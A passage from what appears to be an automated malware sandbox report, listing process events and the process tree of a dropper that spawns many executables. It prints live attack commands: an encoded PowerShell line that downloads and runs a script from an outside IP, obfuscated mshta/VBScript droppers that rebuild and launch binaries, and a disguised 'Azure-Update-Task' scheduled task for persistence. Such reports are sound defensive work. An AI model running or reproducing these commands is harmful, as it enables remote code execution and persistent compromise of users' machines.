2389.exeExplorer.EXEWerFault.exe7587.exepowershell.exeWerFault.exe115B.exetaskkill.exetaskkill.exeWerFault.exe16D9.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1296 2389.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1336 WerFault.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1736 7587.exe Token: SeDebugPrivilege 860 powershell.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2004 WerFault.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1824 115B.exe Token: SeDebugPrivilege 2020 taskkill.exe Token: SeDebugPrivilege 2164 taskkill.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2092 WerFault.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1604 16D9.exe Token: SeDebugPrivilege 2584 WerFault.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
Explorer.EXEpid process 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exeExplorer.EXE1555.exe3843.exe6BD5.exedescription pid process target process PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 320 wrote to memory of 1048 320 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe PID 1204 wrote to memory of 1496 1204 Explorer.EXE 1555.exe PID 1204 wrote to memory of 1496 1204 Explorer.EXE 1555.exe PID 1204 wrote to memory of 1496 1204 Explorer.EXE 1555.exe PID 1204 wrote to memory of 1496 1204 Explorer.EXE 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1496 wrote to memory of 432 1496 1555.exe 1555.exe PID 1204 wrote to memory of 1296 1204 Explorer.EXE 2389.exe PID 1204 wrote to memory of 1296 1204 Explorer.EXE 2389.exe PID 1204 wrote to memory of 1296 1204 Explorer.EXE 2389.exe PID 1204 wrote to memory of 1296 1204 Explorer.EXE 2389.exe PID 1204 wrote to memory of 1872 1204 Explorer.EXE 2C02.exe PID 1204 wrote to memory of 1872 1204 Explorer.EXE 2C02.exe PID 1204 wrote to memory of 1872 1204 Explorer.EXE 2C02.exe PID 1204 wrote to memory of 1872 1204 Explorer.EXE 2C02.exe PID 1204 wrote to memory of 1100 1204 Explorer.EXE 3843.exe PID 1204 wrote to memory of 1100 1204 Explorer.EXE 3843.exe PID 1204 wrote to memory of 1100 1204 Explorer.EXE 3843.exe PID 1204 wrote to memory of 1100 1204 Explorer.EXE 3843.exe PID 1204 wrote to memory of 1752 1204 Explorer.EXE regsvr32.exe PID 1204 wrote to memory of 1752 1204 Explorer.EXE regsvr32.exe PID 1204 wrote to memory of 1752 1204 Explorer.EXE regsvr32.exe PID 1204 wrote to memory of 1752 1204 Explorer.EXE regsvr32.exe PID 1204 wrote to memory of 1752 1204 Explorer.EXE regsvr32.exe PID 1204 wrote to memory of 1044 1204 Explorer.EXE 49C2.exe PID 1204 wrote to memory of 1044 1204 Explorer.EXE 49C2.exe PID 1204 wrote to memory of 1044 1204 Explorer.EXE 49C2.exe PID 1204 wrote to memory of 1044 1204 Explorer.EXE 49C2.exe PID 1204 wrote to memory of 1416 1204 Explorer.EXE 5651.exe PID 1204 wrote to memory of 1416 1204 Explorer.EXE 5651.exe PID 1204 wrote to memory of 1416 1204 Explorer.EXE 5651.exe PID 1204 wrote to memory of 1416 1204 Explorer.EXE 5651.exe PID 1204 wrote to memory of 916 1204 Explorer.EXE 6511.exe PID 1204 wrote to memory of 916 1204 Explorer.EXE 6511.exe PID 1204 wrote to memory of 916 1204 Explorer.EXE 6511.exe PID 1204 wrote to memory of 916 1204 Explorer.EXE 6511.exe PID 1100 wrote to memory of 1336 1100 3843.exe WerFault.exe PID 1100 wrote to memory of 1336 1100 3843.exe WerFault.exe PID 1100 wrote to memory of 1336 1100 3843.exe WerFault.exe PID 1100 wrote to memory of 1336 1100 3843.exe WerFault.exe PID 1204 wrote to memory of 832 1204 Explorer.EXE 6BD5.exe PID 1204 wrote to memory of 832 1204 Explorer.EXE 6BD5.exe PID 1204 wrote to memory of 832 1204 Explorer.EXE 6BD5.exe PID 1204 wrote to memory of 832 1204 Explorer.EXE 6BD5.exe PID 832 wrote to memory of 1148 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1148 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1148 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1148 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1612 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1612 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1612 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1612 832 6BD5.exe cmd.exe PID 832 wrote to memory of 1872 832 6BD5.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1555.exeC:\Users\Admin\AppData\Local\Temp\1555.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1555.exeC:\Users\Admin\AppData\Local\Temp\1555.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2389.exeC:\Users\Admin\AppData\Local\Temp\2389.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2C02.exeC:\Users\Admin\AppData\Local\Temp\2C02.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\3843.exeC:\Users\Admin\AppData\Local\Temp\3843.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 8883⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\403F.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\49C2.exeC:\Users\Admin\AppData\Local\Temp\49C2.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 5283⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5651.exeC:\Users\Admin\AppData\Local\Temp\5651.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6511.exeC:\Users\Admin\AppData\Local\Temp\6511.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6BD5.exeC:\Users\Admin\AppData\Local\Temp\6BD5.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat "C:\Users\Admin\AppData\Local\Temp\6BD5.exe"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat "C:\Users\Admin\AppData\Local\Temp\6BD5.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7587.exeC:\Users\Admin\AppData\Local\Temp\7587.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C4A.exeC:\Users\Admin\AppData\Local\Temp\C4A.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C4A.exeC:\Users\Admin\AppData\Local\Temp\C4A.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\94083928-3961-499c-8af9-20acea08c6f8" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\C4A.exe"C:\Users\Admin\AppData\Local\Temp\C4A.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C4A.exe"C:\Users\Admin\AppData\Local\Temp\C4A.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Modifies extensions of user files
- Loads dropped DLL
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 8768⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\D83.exeC:\Users\Admin\AppData\Local\Temp\D83.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 8883⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\115B.exeC:\Users\Admin\AppData\Local\Temp\115B.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\13BD.exeC:\Users\Admin\AppData\Local\Temp\13BD.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\13BD.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\13BD.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\13BD.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\13BD.exe") do taskkill /iM "%~nXN" -f4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXEMXB89oH1.eXE /poMZbeSahrmSD~4GRjd5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )6⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\YFYnG.AJ8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "13BD.exe" -f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\16D9.exeC:\Users\Admin\AppData\Local\Temp\16D9.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1CE3.exeC:\Users\Admin\AppData\Local\Temp\1CE3.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRipt: ClOSe ( CREAteOBjECt("wSCRipt.SHELl" ).rUN ( "CMd.eXE /q /C CoPy /y ""C:\Users\Admin\AppData\Local\Temp\1CE3.exe"" WZEvHVXQ.exe && StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If """"== """" for %S In ( ""C:\Users\Admin\AppData\Local\Temp\1CE3.exe"" ) do taskkill /Im ""%~nXS"" /f " , 0 ,TRUe ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C CoPy /y "C:\Users\Admin\AppData\Local\Temp\1CE3.exe" WZEvHVXQ.exe&& StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If ""== "" for %S In ( "C:\Users\Admin\AppData\Local\Temp\1CE3.exe" ) do taskkill /Im "%~nXS" /f4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exeWzEVHVxQ.EXe -pLb1CmBqoD82P_5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRipt: ClOSe ( CREAteOBjECt("wSCRipt.SHELl" ).rUN ( "CMd.eXE /q /C CoPy /y ""C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe"" WZEvHVXQ.exe && StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If ""-pLb1CmBqoD82P_ ""== """" for %S In ( ""C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe"" ) do taskkill /Im ""%~nXS"" /f " , 0 ,TRUe ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C CoPy /y "C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe" WZEvHVXQ.exe&& StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If "-pLb1CmBqoD82P_ "== "" for %S In ( "C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe" ) do taskkill /Im "%~nXS" /f7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: cloSE (CREaTEoBJeCT ("wscrIPT.SHELL" ). rUN ( "cMd /C ecHo | SEt /p = ""MZ"" > FEi47NU.NZ & cOpY /B /y Fei47NU.NZ + UwAl.DMK + AN~W6DVb.NJy + UZfZ.n5+ygr0BeOV.8~1 + FJPCK8B.S + 8uJKE.T~T ~ql9by.3KS & stART msiexec -y .\~QL9BY.3KS ", 0 ,tRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ecHo | SEt /p = "MZ" >FEi47NU.NZ &cOpY /B /y Fei47NU.NZ + UwAl.DMK + AN~W6DVb.NJy+ UZfZ.n5+ygr0BeOV.8~1 + FJPCK8B.S + 8uJKE.T~T ~ql9by.3KS & stART msiexec -y .\~QL9BY.3KS7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>FEi47NU.NZ"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y .\~QL9BY.3KS8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "1CE3.exe" /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {5EE0A70D-B562-4977-A3EB-CB3D71BAA413} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\uethwruC:\Users\Admin\AppData\Roaming\uethwru2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uethwruC:\Users\Admin\AppData\Roaming\uethwru3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjthwruC:\Users\Admin\AppData\Roaming\jjthwru2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\jjthwruC:\Users\Admin\AppData\Roaming\jjthwru2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\uethwruC:\Users\Admin\AppData\Roaming\uethwru2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uethwruC:\Users\Admin\AppData\Roaming\uethwru3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
